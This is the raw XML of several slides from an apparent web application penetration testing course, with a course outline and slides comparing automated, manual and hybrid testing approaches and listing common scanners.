          <p:cNvPr id="13" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Types of Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</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685800" y="152400"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Automated Web App </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110595" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="304800" y="1600200"/>
            <a:ext cx="8686800" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Automated tools scan a target website looking for signs of vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many automated scanners available, both commercial and open source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HP WebInspect - commercial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cenzic Hailstorm - commercial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>IBM AppScan - commercial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>ZAP – free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Suite – free/commercial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Rapidly scans site but can still take a long time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Generally requires less time than manual testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Tester has less control of thoroughness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>But, resulting tests tend to be more standardized and consistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Such an approach is more prone to false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Also, this approach typically provides less detail about business implications of discovered flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>More of a surface view of vulnerabilities, rather than in-depth penetration</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219075" y="137160"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Hybrid Web App</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111619" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Use each approach as the test progresses, mixing manual and automated techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Scanners provide a starting point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Manual verification and exploitation follows up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As new components of the application are discovered or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>unlocked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> manually, the tester may run automated scans of them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The process is iterative, building on itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Scripting as the test dictates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This course is based on a hybrid approach, which is used by most testers today</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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
